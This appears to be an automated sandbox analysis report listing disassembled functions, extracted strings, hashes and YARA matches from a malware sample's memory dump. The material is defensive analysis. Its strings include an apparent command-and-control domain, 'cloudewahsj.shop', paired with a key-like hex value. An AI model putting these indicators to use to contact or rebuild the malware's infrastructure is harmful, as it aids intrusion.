                                                                              • API String ID: 4116985748-3916222277
                                                                              • Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                              • Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
                                                                              • Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                              • Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A
                                                                              Function 00427FC0 Relevance: 5.4, Strings: 4, Instructions: 431COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #C}$@-$up$vC
                                                                              • API String ID: 0-3794437364
                                                                              • Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                              • Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
                                                                              • Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                              • Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A
                                                                              Function 0041906A Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 67$J$u$wq
                                                                              • API String ID: 0-4028943437
                                                                              • Opcode ID: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                                                              • Instruction ID: 45cabc22797d8237a69fda20461bdfe49cb428b8aed426b658ce7b40843b0e88
                                                                              • Opcode Fuzzy Hash: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                                                              • Instruction Fuzzy Hash: 2AB176B04483828BD7348F25C4A17EBBBE1EF92314F14892DD8D94B785E7794886CB87
                                                                              Function 004437D0 Relevance: 4.4, Strings: 3, Instructions: 647COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                              • Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
                                                                              • Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                              • Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85
                                                                              Function 004438E0 Relevance: 4.3, Strings: 3, Instructions: 577COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                              • Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
                                                                              • Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                              • Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                                              Function 004438FB Relevance: 4.3, Strings: 3, Instructions: 566COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                              • Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
                                                                              • Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                              • Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85
                                                                              Function 004438F9 Relevance: 4.3, Strings: 3, Instructions: 565COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                                              • Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
                                                                              • Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                                              • Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                                              Function 00440B00 Relevance: 4.3, Strings: 3, Instructions: 555COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: S"(w$S"(w$f
                                                                              • API String ID: 2994545307-891790955
                                                                              • Opcode ID: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                                                              • Instruction ID: 3cfac3c3f928c660201977811b78d3d3052ee887d4b0c26ff85acd92e20ac89e
                                                                              • Opcode Fuzzy Hash: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                                                              • Instruction Fuzzy Hash: B412E1756083508FE324CF19C880B2BBBE1BBC9314F148A6EE9D45B3A1D775AC45CB96
                                                                              Function 02120D67 Relevance: 4.3, Strings: 3, Instructions: 555COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: S"(w$S"(w$f
                                                                              • API String ID: 0-891790955
                                                                              • Opcode ID: 921702299f1cd4c13fffa9b783ac6d262d1d77973908fbb24f5e35fc36ff4b1f
                                                                              • Instruction ID: 4fb4f3989973b5a411e2ab5224d4fa50da7482a36b3864bdd3ecb44fc834f448
                                                                              • Opcode Fuzzy Hash: 921702299f1cd4c13fffa9b783ac6d262d1d77973908fbb24f5e35fc36ff4b1f
                                                                              • Instruction Fuzzy Hash: E212E3716483A09FD724CF15D880B6ABBE2FFC5318F14862CF4995B392D7719819CB92
                                                                              Function 00443A30 Relevance: 4.2, Strings: 3, Instructions: 488COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                                                              • Instruction ID: 631fa3f1d4c0726364ceec28ad2e892877ef6bcbce7aa5fcc49a4e7daf9cf800
                                                                              • Opcode Fuzzy Hash: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                                                              • Instruction Fuzzy Hash: DAE1FE39B09321CFD304DF29D89072AB7E2FB9A311F4A887DD589873A2D634D941CB85
                                                                              Function 004239EB Relevance: 4.2, Strings: 3, Instructions: 458COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 37E0CC8E008D304A822D1F4978021086$cloudewahsj.shop$yD
                                                                              • API String ID: 0-2844569758
                                                                              • Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction ID: ea6ce95d3b2e4101921536522c50bf2979d69fc2778ed717b5a7399473229c95
                                                                              • Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction Fuzzy Hash: BF322951608BD28DD326CB7C8848355BF912B27228F1C87DDD1E94F3D3D2AA8587C7A6
                                                                              Function 02103C52 Relevance: 4.2, Strings: 3, Instructions: 458COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 37E0CC8E008D304A822D1F4978021086$cloudewahsj.shop$yD
                                                                              • API String ID: 0-2844569758
                                                                              • Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction ID: 871b344d276ad9ec18211cdd288877dece8cd7d30e4d034214d0831ce8887517
                                                                              • Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction Fuzzy Hash: 8C3229615087C28DD726CA3C8888355BF912B67228F1C87DDD1E94F3D3D3AA8587C7A6
                                                                              Function 021025D7 Relevance: 4.2, Strings: 3, Instructions: 457COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                              • API String ID: 0-185452761
                                                                              • Opcode ID: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
                                                                              • Instruction ID: fa2a646c56ecb98ff3369e84eb354fbc62152b2c9113dfe59572bbf826f6bdf4
                                                                              • Opcode Fuzzy Hash: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
                                                                              • Instruction Fuzzy Hash: E5D18CB06483808FD714DF68C895BABBBE4FF85718F14491CE9958B391E7B8D809CB52
                                                                              Function 00443AC0 Relevance: 4.2, Strings: 3, Instructions: 453COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                                                              • Instruction ID: ab5f315b9e91ee1687aa44fd25e1738b775e8891b6341d15c5394949b1c7dc9f
                                                                              • Opcode Fuzzy Hash: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                                                              • Instruction Fuzzy Hash: 53D1FF3AA08310CFD314DF29D89072AB7E2FBDA310F4A897DE58987392D674D941CB85
                                                                              Function 00421180 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8deZ$<`>f$567
                                                                              • API String ID: 0-937435233
                                                                              • Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction ID: 754c1abd1b676f1653a7a5478e22f099d0a2726f3b1f9a9f143ecbe85e8fc021
                                                                              • Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction Fuzzy Hash: 99D1FFB06083208BD720DF24C851B6BB7F2FFE1354F498A6DE4858B3A5E3799845C756
                                                                              Function 021013E7 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8deZ$<`>f$567
                                                                              • API String ID: 0-937435233
                                                                              • Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction ID: 266df254f3474c96dac5a4f3ce01632a0fcf85f4a6e9e96e7edac86c7bd1312f
                                                                              • Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction Fuzzy Hash: A8D1EFB15583008BD724DF24C891B6BB7F2EFC2318F09892CE4898B3D5E7B99445CB56
                                                                              Function 0042F716 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 5$Tx+$bC
                                                                              • API String ID: 0-2958649183
                                                                              • Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                                              • Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
                                                                              • Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                                              • Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56
                                                                              Function 00428750 Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: &76#$/X$BDE:
                                                                              • API String ID: 2994545307-3468712750
                                                                              • Opcode ID: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                                                              • Instruction ID: de511f14106650819994a34559177bbffe3ae858db635c904efe7b47fdd347f8
                                                                              • Opcode Fuzzy Hash: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                                                              • Instruction Fuzzy Hash: 4C9146B27093119BD3109F25EC8176FB6D2EBC5318F58813EE4858B381EA3C9846878B
                                                                              Function 021089B7 Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &76#$/X$BDE:
                                                                              • API String ID: 0-3468712750
                                                                              • Opcode ID: 3e21cf73c2ae3528f4817cde07a7e232aa130a7225a0a67fc89e53a2e6491216
                                                                              • Instruction ID: d464608606054b59f4836a3b341abe6e3b8d719381091f0d1afd418675d20b57
                                                                              • Opcode Fuzzy Hash: 3e21cf73c2ae3528f4817cde07a7e232aa130a7225a0a67fc89e53a2e6491216
                                                                              • Instruction Fuzzy Hash: 139135B26493008BD7249F25CCD17ABB6E2EFC5318F1A853CE4858B2D0E7B99806C756
                                                                              Function 0042FB7D Relevance: 4.1, Strings: 3, Instructions: 327COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 5$Tx+$bC
                                                                              • API String ID: 0-2958649183
                                                                              • Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                                              • Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
                                                                              • Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                                              • Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56
                                                                              Function 0043099F Relevance: 4.0, Strings: 3, Instructions: 251COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ut$.^Nw$QRP,
                                                                              • API String ID: 0-2489489831
                                                                              • Opcode ID: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                                                              • Instruction ID: c8479f28a28c815cfbd9d5fc95f9476b123213feaa6e9ea5c0c948cebaf48d73
                                                                              • Opcode Fuzzy Hash: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                                                              • Instruction Fuzzy Hash: 3B710A7110D3918FD3258B2588B03E7BBD19FDB704F585A5DD0CA4B341DB794906CB56
                                                                              Function 0040F2D0 Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $:$K
                                                                              • API String ID: 0-296352136
                                                                              • Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction ID: e3fd2fc2a8267f717fe0e7e766dd9ea259cde5192962e3fe240e8cbdfa04c585
                                                                              • Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction Fuzzy Hash: 3A51A27250C7908AD7209B3884543AFBBD0AB96334F190F7EE8EAE73C1E67885458757
                                                                              Function 020EF537 Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $:$K
                                                                              • API String ID: 0-296352136
                                                                              • Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction ID: d67ad62ce36ab1dc8dda3bd351edecac75dacb55de9d7e73957b50944a5c7e5c
                                                                              • Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction Fuzzy Hash: 1751F57250C7908FDB258B3888583AFBBD0AB95324F090F6DD9EAD73C1E6748641D752
                                                                              Function 0210829E Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @-$up$vC
                                                                              • API String ID: 0-1828384444
                                                                              • Opcode ID: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
                                                                              • Instruction ID: 87c970690bb8e648ca60e297e6bc1b88414b699a6ce19e7478b355fb598f3ec0
                                                                              • Opcode Fuzzy Hash: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
                                                                              • Instruction Fuzzy Hash: 1E412EB02497819FE3248FA1D894B9BBBE2BBC6344F148A2DE1D84B351C7788449CF57
                                                                              Function 020E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$GetProcAddress.$l
                                                                              • API String ID: 0-2784972518
                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                              • Instruction ID: 9bf1a15524f93da5d415a352a70f6fdaaa80b869e271974596a4df611b68795a
                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                              • Instruction Fuzzy Hash: 133149B6900709DFDB11CF99C880AAEBBF6FF58324F14404AD442B7210D7B1EA85CBA4
                                                                              Function 020F7950 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,-000000D5,00000000,00000000,?), ref: 020F7C78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: X2c0
                                                                              • API String ID: 237503144-1612431719
                                                                              • Opcode ID: 699e62a66c8bd060c75555ea85a6e323f78b4898e6ba044fdc3f12d6ed4cc69d
                                                                              • Instruction ID: d2b98de4fa96c588d2d2d0dcea0a7be6f1161913ef4a0597efc8aea63656d32d
                                                                              • Opcode Fuzzy Hash: 699e62a66c8bd060c75555ea85a6e323f78b4898e6ba044fdc3f12d6ed4cc69d
                                                                              • Instruction Fuzzy Hash: F0A121329483228BC364CF28C8903ABF7E1FFC4754F1A892DE9C59B661E7748945D786
                                                                              Function 00404E20 Relevance: 3.3, Strings: 2, Instructions: 792COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$8
                                                                              • API String ID: 0-46163386
                                                                              • Opcode ID: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                                                              • Instruction ID: 19de03d7aa05240092aa3acb4ee1ab33a8cd98421fbae1c194af479a45b94dce
                                                                              • Opcode Fuzzy Hash: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                                                              • Instruction Fuzzy Hash: 3B720171508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96
                                                                              Function 0041F9A0 Relevance: 3.3, Strings: 2, Instructions: 771COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
